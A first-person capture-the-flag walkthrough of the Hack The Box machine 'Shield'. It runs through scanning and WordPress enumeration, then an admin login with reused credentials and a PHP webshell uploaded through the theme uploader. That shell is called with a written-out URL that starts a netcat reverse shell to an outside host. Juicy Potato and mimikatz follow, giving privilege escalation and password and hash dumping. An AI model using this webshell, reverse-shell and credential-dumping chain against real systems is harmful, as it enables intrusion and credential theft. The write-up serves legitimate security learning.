Okay, next box in the series. We have our list of credentials we’ve found from the last boxes and are looking to learn something new. Let’s start of with running masscan to see what we got that we can pass on to nmap. Masscan is super fast and can be a quick look at what we got to focus nmap on the right things. We can also specify the rate, which allows us to adjust for packets that are dropped due to multiple problems that can occur (server, network, etc). I can scan through a lot of ports really quick.
Above is a good example of masscan running too fast for the server. I tried running at a rate of 100,000 and I didn’t get results, but it got done in under 10 secons. I lower the rate, and then i get some results. Took a few seconds longer (we are only doing one box not a network), but it finds results. Now I can take those results and let nmap run with its safe scripts and OS detection to give us some speedy results.
Running nmap I get only two ports. However there is a line that says “bank.htb” and that seems suspicious. Did it do a DNS lookup? Kinda. As I have done other boxes with HTB, there is an old machine called “Bank” that has the same IP address as Shield does. I added that to my /etc/hosts file back when I did the Bank box and nmap used that to fill in the blank for me. Bit of a false positive there, but remember what nmap is doing and it makes sense. If we do need to do virtual host routing, we’ll have to go change that. Anyway, the results say that MySQL is running, but it requires authentication. Guess we’ll start with port 80. We see the header, so let’s go see the page.
Its the default page, so dead-end there. Well, let’s dig into the server and see if there are hosted files somewhere. I’ll run feroxbuster and see what we get. I like this tool because when it finds a page it just runs itself again on that new page. This can be good and bad, so use caution. If this page prevents constant queries or gets overloaded by all the requests, it could crash. There are lots of tools out there, just need to find the one you like
It finds a wordPress directory and then keeps going in. Perfect. There is a scanner for wordpress, so let’s just go start that. I have an api key (which you can get for free), so I fire it up.
It runs and find a bunch of vulnerabilities in the plugins and site itself. Most are XSS and Authenticated vulnerabilities. I’m going to have to get some access to leverage some of these. It does identify admin as a user. Since these boxes seem to be going together, let’s try those passwords we’ve been keeping.
Winner! Okay. We can log in to the page now and see if any of those CVEs that were identified can be leveraged to get us something good! Looks like we can upload media, themes, pages, etc. I’ll start in the themes to see what we can do. I’ll start just by trying to upload a php-rev shell that I copy from /usr/share/webshell/php/php-reverse-shell.php. It gives me this error:
That means the theme couldn’t be uploaded, but doesn’t mean the file didn’t upload. Where would it go? Let’s go look at our ferroxbuster output and see.
We got a 301 when it ran, but let’s go see if it is there. Bingo!
So close. So the file uploaded, but it is failing. Well, this is a problem with that php-reverse-shell.php that sometimes happens when it can’t start the subprocess. If we go look at the listener, we can see the problem:
This php shell thinks we are on a linux box and is running linux commands. Now what we want. Let’s grab a different shell and use it. We’ll try simple-backdoor.php from that same directory. And nice:
We have a simple backdoor we can use to run commands. We know it is a windows box, so what can we do? Keeping it simple, let’s try to upload a nc.exe and have netcat give us a shell. We can upload the nc.exe the same we we added the plugin. We can verify it is there now:
Cool. Let’s call it and have a shell. http://10.10.10.29/Wordpress/wp-content/Uploads/simple-backdoor.php?cmd=.\nc.exe%20-e%20cmd.exe%2010.10.14.30%2012345 and we have one. Since I am a lowly iusr, let’s get winPEAS running.
Okay, winPEAS helps us hone in on a few things here. Here are my first-pass takeaways: 8 CVEs available, running windows 2016:1607, lsa/Cred Guard is off, SeImpersonatePrivilege is on, MEGACORP\sandra was logged on and is in autologin, local port of 1900 is running, and the firewall is on. Those are all good things, but I’ve seen SeImpersonatePrivilege before and that is “juicy potato”. That should be a quick win, let’s try. If you don’t already have it, go to github and find a juicy potato exploit. If you don’t want to compile it yourself, grab the executable. If you do, fire up Visual Studio and go for it.
Looking at the README page, juicy potato lets us run cmd.exe. Let’s put a revshell in a batch file and let call us back.
So we try to run the tater.exe, but it fails for a bad CLSID. The Readme file warns about that and provides a link to find one that works. Since we are ao windows 2016 box, I’ll pick the top one from the list. Trying again, it says wrong argument. Powershell is doing some parameter expansion here, so let’s go again in cmd shell.
And now we got a shell! We can go do as we want, but there is one more thing I wrote down from winPEAS that I want…that password! It said sandra was logged on, so her password should be available to skim. Let’s upload mimikatz and see what we can pull.
If you don’t have it already installed, a quick “apt install mimikatz” can have it available. Now that we have it, let’s dump what we can.
And there is both the NTLM and plan-text password for Sandra, as well as we got the local Admin hash. Cool.
Last step is to clean up for the next person. I kept everything I did in the uploads directory, so a quick delete of those guys and we can wrap up shop. Hopefully that was a learning experience. See you on the next box!